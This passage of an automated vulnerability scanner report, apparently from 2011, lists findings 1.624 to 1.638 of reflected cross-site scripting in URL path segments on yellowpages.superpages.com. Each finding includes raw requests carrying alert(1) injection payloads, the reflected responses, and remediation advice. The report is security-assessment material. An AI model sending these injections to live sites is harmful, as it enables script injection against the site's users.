Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/s_code.jsb38e5&quot;-alert(1)-&quot;7e6c3fe42b7
Server: Unspecified
Set-Cookie: JSESSIONID=7C8652CC4A96C376FF779F3B2EFDF4DA; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:53 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
/yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/s_code.jsb38e5"-alert(1)-"7e6c3fe42b7?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.624. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/sendtom.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77bf9"-alert(1)-"8dab2c2c71d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common77bf9"-alert(1)-"8dab2c2c71d/js/sendtom.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common77bf9&quot;-alert(1)-&quot;8dab2c2c71d/js/sendtom.js
Server: Unspecified
Set-Cookie: JSESSIONID=983DC2F2B845AB07443C74AFEC6EC3C9; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:31 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common77bf9"-alert(1)-"8dab2c2c71d/js/sendtom.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.625. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/sendtom.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f6a0"-alert(1)-"aaabf2e973b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js1f6a0"-alert(1)-"aaabf2e973b/sendtom.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js1f6a0&quot;-alert(1)-&quot;aaabf2e973b/sendtom.js
Server: Unspecified
Set-Cookie: JSESSIONID=6CD48A2FE82530486D8D85DC245C52C4; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:38 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js1f6a0"-alert(1)-"aaabf2e973b/sendtom.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.626. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/sendtom.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eabbc"-alert(1)-"b304378f63d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/sendtom.jseabbc"-alert(1)-"b304378f63d HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/sendtom.jseabbc&quot;-alert(1)-&quot;b304378f63d
Server: Unspecified
Set-Cookie: JSESSIONID=74A77B104A3B996CCA486703E507CA88; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:45 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/sendtom.jseabbc"-alert(1)-"b304378f63d?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.627. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/spflyouts.1.0.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4461d"-alert(1)-"6930c85dd26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common4461d"-alert(1)-"6930c85dd26/js/spflyouts.1.0.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common4461d&quot;-alert(1)-&quot;6930c85dd26/js/spflyouts.1.0.js
Server: Unspecified
Set-Cookie: JSESSIONID=F173D17509F7FCAEF102A94A23B8CBF8; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:00 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common4461d"-alert(1)-"6930c85dd26/js/spflyouts.1.0.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.628. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/spflyouts.1.0.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91df3"-alert(1)-"e8a95c1c0a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js91df3"-alert(1)-"e8a95c1c0a9/spflyouts.1.0.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js91df3&quot;-alert(1)-&quot;e8a95c1c0a9/spflyouts.1.0.js
Server: Unspecified
Set-Cookie: JSESSIONID=F03C23C51384E7387839BE0403233F2F; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:08 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js91df3"-alert(1)-"e8a95c1c0a9/spflyouts.1.0.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.629. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/spflyouts.1.0.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cc0a"-alert(1)-"689c16f939c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/spflyouts.1.0.js2cc0a"-alert(1)-"689c16f939c HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/spflyouts.1.0.js2cc0a&quot;-alert(1)-&quot;689c16f939c
Server: Unspecified
Set-Cookie: JSESSIONID=6AC921D19E8E658E299A352472A367AB; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:22 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
pages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/spflyouts.1.0.js2cc0a"-alert(1)-"689c16f939c?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.630. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/swfobject.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98ab9"-alert(1)-"d45a7fa5aaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common98ab9"-alert(1)-"d45a7fa5aaf/js/swfobject.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common98ab9&quot;-alert(1)-&quot;d45a7fa5aaf/js/swfobject.js
Server: Unspecified
Set-Cookie: JSESSIONID=36DFAAE7A032362EAD1EE07FE700AD0E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:27 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common98ab9"-alert(1)-"d45a7fa5aaf/js/swfobject.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.631. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/swfobject.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df462"-alert(1)-"539d2934731 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/jsdf462"-alert(1)-"539d2934731/swfobject.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/jsdf462&quot;-alert(1)-&quot;539d2934731/swfobject.js
Server: Unspecified
Set-Cookie: JSESSIONID=C59E3AC4220944843B48F6BB847E4A3D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:35 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/jsdf462"-alert(1)-"539d2934731/swfobject.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.632. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/swfobject.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8519c"-alert(1)-"64c92015151 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/swfobject.js8519c"-alert(1)-"64c92015151 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/swfobject.js8519c&quot;-alert(1)-&quot;64c92015151
Server: Unspecified
Set-Cookie: JSESSIONID=534F43F8840C3F0B4E24401AC93C69ED; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:46 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
llowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/swfobject.js8519c"-alert(1)-"64c92015151?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.633. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/widget.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 633b9"-alert(1)-"357d38575b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common633b9"-alert(1)-"357d38575b/js/widget.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common633b9&quot;-alert(1)-&quot;357d38575b/js/widget.js
Server: Unspecified
Set-Cookie: JSESSIONID=EF961C373B22D3D46A32D7CCF7FFBD15; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:08 GMT
Cache-Control: private
Content-Length: 36075


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common633b9"-alert(1)-"357d38575b/js/widget.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.634. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/widget.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfd66"-alert(1)-"3845f6ea7bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/jsdfd66"-alert(1)-"3845f6ea7bb/widget.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/jsdfd66&quot;-alert(1)-&quot;3845f6ea7bb/widget.js
Server: Unspecified
Set-Cookie: JSESSIONID=0081BD1CF81E1EE984F6C8482C688002; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:16 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/jsdfd66"-alert(1)-"3845f6ea7bb/widget.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.635. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/widget.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcb24"-alert(1)-"a6a108b5958 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/widget.jsbcb24"-alert(1)-"a6a108b5958 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/widget.jsbcb24&quot;-alert(1)-&quot;a6a108b5958
Server: Unspecified
Set-Cookie: JSESSIONID=843B6CF9DEDBEBDE61C92986F1356639; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:23 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
/yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/widget.jsbcb24"-alert(1)-"a6a108b5958?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.636. http://yellowpages.superpages.com/common/shared.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/shared.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f8b6"-alert(1)-"067297a1807 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common1f8b6"-alert(1)-"067297a1807/shared.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common1f8b6&quot;-alert(1)-&quot;067297a1807/shared.js
Server: Unspecified
Set-Cookie: JSESSIONID=6C20F9C369195FD6680789B4DF391F6D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:06 GMT
Cache-Control: private
Content-Length: 36071


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common1f8b6"-alert(1)-"067297a1807/shared.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.637. http://yellowpages.superpages.com/common/shared.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/shared.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d77a"-alert(1)-"d7d525d2174 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/shared.js5d77a"-alert(1)-"d7d525d2174 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/shared.js5d77a&quot;-alert(1)-&quot;d7d525d2174
Server: Unspecified
Set-Cookie: JSESSIONID=8C5DF724BAACBD276D5052291066409F; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:14 GMT
Cache-Control: private
Content-Length: 36071


                       <!--
       
       -->


                                   
...[SNIP]...
p://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/shared.js5d77a"-alert(1)-"d7d525d2174?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.638. http://yellowpages.superpages.com/listings.jsp [C parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
